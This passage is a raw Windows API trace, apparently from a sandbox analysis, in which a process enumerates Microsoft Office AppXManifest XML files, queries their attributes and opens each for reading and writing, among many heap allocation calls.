[0099.262] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.262] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8396fbd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8396fbd3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP5E1E~1.XML")) returned 1 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69030 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69030 | out: hHeap=0x20000) returned 1 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c650 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0099.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0099.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0099.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x899e0 [0099.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88d30 [0099.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x899e0 | out: hHeap=0x20000) returned 1 [0099.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88d30 | out: hHeap=0x20000) returned 1 [0099.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.263] AreFileApisANSI () returned 1 [0099.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.263] AreFileApisANSI () returned 1 [0099.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 105 [0099.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.264] GetFileType (hFile=0x360) returned 0x1 [0099.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.265] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.265] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.265] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.265] CloseHandle (hObject=0x360) returned 1 [0099.266] AreFileApisANSI () returned 1 [0099.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 105 [0099.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.266] GetFileType (hFile=0x360) returned 0x1 [0099.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.266] CloseHandle (hObject=0x360) returned 1 [0099.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.267] AreFileApisANSI () returned 1 [0099.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 105 [0099.267] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8396fbd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8396fbd3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.268] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.268] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.268] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83485006, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83485006, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x834ab261, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x80e56, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", cAlternateFileName="APPXMA~3.XML")) returned 1 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cd88 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89558 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88fe8 [0099.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89558 | out: hHeap=0x20000) returned 1 [0099.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88fe8 | out: hHeap=0x20000) returned 1 [0099.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.269] AreFileApisANSI () returned 1 [0099.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0099.269] AreFileApisANSI () returned 1 [0099.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 105 [0099.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.269] GetFileType (hFile=0x360) returned 0x1 [0099.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.270] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.270] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.270] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.270] CloseHandle (hObject=0x360) returned 1 [0099.270] AreFileApisANSI () returned 1 [0099.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 105 [0099.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.270] GetFileType (hFile=0x360) returned 0x1 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.271] CloseHandle (hObject=0x360) returned 1 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, 